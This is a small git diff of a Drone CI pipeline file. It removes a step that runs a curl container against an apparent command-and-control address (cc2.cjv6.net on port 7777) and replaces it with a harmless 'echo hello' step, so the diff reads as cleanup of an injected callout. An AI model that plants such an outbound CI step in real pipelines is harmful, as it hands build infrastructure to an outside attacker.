diff --git a/.drone.yml b/.drone.yml index a26e57f..ca060dd 100644 --- a/.drone.yml +++ b/.drone.yml @@ -4,7 +4,7 @@ type: docker name: default steps: - image: curlimages/curl:latest +- image: bash commands: - - "http://cc2.cjv6.net:7777/nequsajifa" + - echo "hello" ...